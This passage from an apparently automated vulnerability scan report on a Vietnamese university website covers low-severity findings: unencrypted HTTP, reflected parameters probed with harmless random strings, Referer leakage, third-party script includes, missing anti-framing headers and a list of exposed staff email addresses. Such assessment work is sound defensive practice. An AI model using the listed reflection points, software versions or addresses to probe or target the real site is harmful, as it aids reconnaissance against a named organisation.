Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=t96csosiqtlagp2pe45ir2rnb1; path=/
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:36:56 GMT
Connection: close
Content-Length: 50699

<!DOCTYPE html>
<html ng-app="">
<head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Rem
...[SNIP]...
4. Unencrypted communications

Summary

Severity:  Low
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /

Issue description

The application allows users to connect to it over unencrypted connections. An attacker suitably positioned to view a legitimate user's network traffic could record and monitor their interactions with the application and obtain any information the user supplies. Furthermore, an attacker able to modify traffic could use the application as a platform for attacks against its users and third-party websites. Unencrypted connections have been exploited by ISPs and governments to track users, and to inject adverts and malicious JavaScript. Due to these concerns, web browser vendors are planning to visually flag unencrypted connections as hazardous.
To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.
Please note that using a mixture of encrypted and unencrypted communications is an ineffective defense against active attackers, because they can easily remove references to encrypted resources when these references are transmitted over an unencrypted connection.

Issue remediation

Applications should use transport-level encryption (SSL/TLS) to protect all communications passing between the client and the server. The Strict-Transport-Security HTTP header should be used to ensure that clients refuse to access the server over an insecure connection.

5. Input returned in response (reflected)

There are 8 instances of this issue:

Issue background

Reflection of input arises when data is copied from a request and echoed into the application's immediate response.
Input being returned in application responses is not a vulnerability in its own right. However, it is a prerequisite for many client-side vulnerabilities, including cross-site scripting, open redirection, content spoofing, and response header injection. Additionally, some server-side vulnerabilities such as SQL injection are often easier to identify and exploit when input is returned in responses. In applications where input retrieval is rare and the environment is resistant to automated testing (for example, due to a web application firewall), it might be worth subjecting instances of it to focused manual testing.

5.1. http://www.tgu.edu.vn/topic/ [11387 parameter]

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11387 request parameter is copied into the application's response.

Request

GET /topic/?11387=bxn2v1b4gx HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=8hgqdfquccnug7lp9itk05d2t2;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:54:30 GMT
Connection: close
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11387=bxn2v1b4gx"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.2. http://www.tgu.edu.vn/topic/ [11408 parameter]

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11408 request parameter is copied into the application's response.

Request

GET /topic/?11408=8x88big4w5 HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=t6tbq2c93ngipudm40emf5q9o7;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:52:04 GMT
Connection: close
Content-Length: 16897

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11408=8x88big4w5"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.3. http://www.tgu.edu.vn/topic/ [11526 parameter]

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11526 request parameter is copied into the application's response.

Request

GET /topic/?11526=psxqhb3c98 HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=gerbkpeqs7b1ruioj2u5m1i0k6;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:55:37 GMT
Connection: close
Content-Length: 25824

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11526=psxqhb3c98"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.4. http://www.tgu.edu.vn/topic/ [11539 parameter]

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11539 request parameter is copied into the application's response.

Request

GET /topic/?11539=g242uob752 HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=i336pgatekcsu1rjlqqrm8npn5;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:55:57 GMT
Connection: close
Content-Length: 36602

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11539=g242uob752"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.5. http://www.tgu.edu.vn/topic/ [11542 parameter]

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11542 request parameter is copied into the application's response.

Request

GET /topic/?11542=l1lxe1vd92 HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=pu4sbkvs93q4posm0ci2b9t4t7;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:54:56 GMT
Connection: close
Content-Length: 23592

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11542=l1lxe1vd92"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.6. http://www.tgu.edu.vn/topic/ [11556 parameter]

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11556 request parameter is copied into the application's response.

Request

GET /topic/?11556=fffhz6rd7x HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=ph64imi6u9t1hdnakjoclp0gn5;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:55:09 GMT
Connection: close
Content-Length: 27001

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11556=fffhz6rd7x"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.7. http://www.tgu.edu.vn/topic/ [8044 parameter]

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 8044 request parameter is copied into the application's response.

Request

GET /topic/?8044=0rj9recdob HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=dtqntjp4qof02c2mrhthnvhbp5;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 14:59:50 GMT
Connection: close
Content-Length: 16264

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?8044=0rj9recdob"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.8. http://www.tgu.edu.vn/topic/ [name of an arbitrarily supplied URL parameter]

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request

GET /topic/?11408=&bxpfap9d8s=1 HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=t6tbq2c93ngipudm40emf5q9o7;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 14:10:29 GMT
Connection: close
Content-Length: 16900

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11408=&bxpfap9d8s=1"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-bor
...[SNIP]...
6. Cross-domain Referer leakage

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /

Issue detail

The application contains links to other domains from URLs containing a query string. Numerous links to other domains were found.

This issue was found in multiple locations under the reported path.

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behavior should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

Applications should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties. If placing sensitive information in the URL is unavoidable, consider using the Referer-Policy HTTP header to reduce the chance of it being disclosed to third parties.

Request 1

GET /topic/?11556= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=440ehrd3vr7uge6bmmovfq3kc2

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:44:59 GMT
Connection: close
Content-Length: 26991

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<![endif]-->
  
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
...[SNIP]...
<!-- Your share button code -->
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11556="
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
text-decoration: none;"
class="fb-share">

Chia s...
</a>
...[SNIP]...

Request 2

GET /topic/?11387= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=vajug7ptns97blqrojb6jrfdi1

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:42:40 GMT
Connection: close
Content-Length: 16489

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<div><iframe frameborder="0" src="http://docs.google.com/gview?url=http://tgu.edu.vn/upload/files/KQ_TH6.xlsx&amp;embedded=true" style="width: 100%; height: 700px;"></iframe>
...[SNIP]...

Request 3

GET /topics/?0.247.0.0= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=e6t9ucbd4hbcs274sfuhuronq7

Response 3

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:39:10 GMT
Connection: close
Content-Length: 26129

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<img src="/images/e-office.png"/><a href="http://dhtg.vpdttg.vn" target="_blank">V..n Ph..ng ..i...n t...</a>
...[SNIP]...
7. Cross-domain script include

There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. Applications that rely on third-party scripts should consider copying the contents of these scripts onto their own domain and including them from there. If that is not possible (e.g. for licensing reasons) then consider reimplementing the script's functionality within application code.

7.1. http://www.tgu.edu.vn/

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /

Issue detail

The response dynamically includes the following script from another domain:
  • https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js
This issue was found in multiple locations under the reported path.

Request 1

GET /topic/?11556= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=440ehrd3vr7uge6bmmovfq3kc2

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:44:59 GMT
Connection: close
Content-Length: 26991

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<![endif]-->
  
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
...[SNIP]...

Request 2

GET /topics/?0.247.0.0= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=e6t9ucbd4hbcs274sfuhuronq7

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:39:10 GMT
Connection: close
Content-Length: 26129

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<![endif]-->
  
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
...[SNIP]...

Request 3

GET /topic/?11387= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=vajug7ptns97blqrojb6jrfdi1

Response 3

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:42:40 GMT
Connection: close
Content-Length: 16489

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<![endif]-->
  
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
...[SNIP]...
7.2. http://www.tgu.edu.vn/dstt/

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /dstt/

Issue detail

The response dynamically includes the following script from another domain:
  • https://code.jquery.com/jquery-1.12.4.min.js

Request 1

GET /dstt/ HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=gc1lt2o1pii04nm5kvp7ipnr56

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:43:36 GMT
Connection: close
Content-Length: 3462

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html ng-app="">

<head>
<meta http-equiv="content-type" content="text/
...[SNIP]...
</script>
<script src="https://code.jquery.com/jquery-1.12.4.min.js"></script>
...[SNIP]...
8. Frameable response (potential Clickjacking)

Summary

Severity:  Information
Confidence:  Firm
Host:  http://www.tgu.edu.vn
Path:  /

Issue detail

This issue was found in multiple locations under the reported path.

Issue background

If a page fails to set an appropriate X-Frame-Options or Content-Security-Policy HTTP header, it might be possible for a page controlled by an attacker to load it within an iframe. This may enable a clickjacking attack, in which the attacker's page overlays the target application's interface with a different interface provided by the attacker. By inducing victim users to perform actions such as mouse clicks and keystrokes, the attacker can cause them to unwittingly carry out actions within the application that is being targeted. This technique allows the attacker to circumvent defenses against cross-site request forgery, and may result in unauthorized actions.
Note that some applications attempt to prevent these attacks from within the HTML page itself, using "framebusting" code. However, this type of defense is normally ineffective and can usually be circumvented by a skilled attacker.
You should determine whether any functions accessible within frameable pages can be used by application users to perform any sensitive actions within the application.

Issue remediation

To effectively prevent framing attacks, the application should return a response header with the name X-Frame-Options and the value DENY to prevent framing altogether, or the value SAMEORIGIN to allow framing only by pages on the same origin as the response itself. Note that the SAMEORIGIN header can be partially bypassed if the application itself can be made to frame untrusted websites.

Request 1

GET /topic/?11556= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=440ehrd3vr7uge6bmmovfq3kc2

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:44:59 GMT
Connection: close
Content-Length: 26991

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...

Request 2

GET /topics/?0.247.0.0= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=e6t9ucbd4hbcs274sfuhuronq7

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:39:10 GMT
Connection: close
Content-Length: 26129

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...

Request 3

GET /topic/?11387= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=vajug7ptns97blqrojb6jrfdi1

Response 3

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:42:40 GMT
Connection: close
Content-Length: 16489

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
9. Email addresses disclosed

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /

Issue detail

The following email addresses were disclosed in the response:
  • daihoctg@tgu.edu.vn
  • webmaster@tgu.edu.vn
  • ptaivu@tgu.edu.vn
  • ttthnn@tgu.edu.vn
  • pquantritb@tgu.edu.vn
  • info@vied.vn
  • tuyensinh@vied.vn
  • ttkhaothi@tgu.edu.vn
  • kktxd@tgu.edu.vn
  • ptchc@tgu.edu.vn
  • knncntp@tgu.edu.vn
  • pttpc@tgu.edu.vn
  • ksupham@tgu.edu.vn
  • tuyensinh@tgu.edu.vn
  • vanht@most.gov.vn
  • bmgdtcqp@tgu.edu.vn
  • kkhtn@tgu.edu.vn
  • pctsv@tgu.edu.vn
  • pqldt@tgu.edu.vn
  • kktl@tgu.edu.vn
Numerous email addresses were found to be disclosed and the above are a sample subset.

This issue was found in multiple locations under the reported path.

Issue background

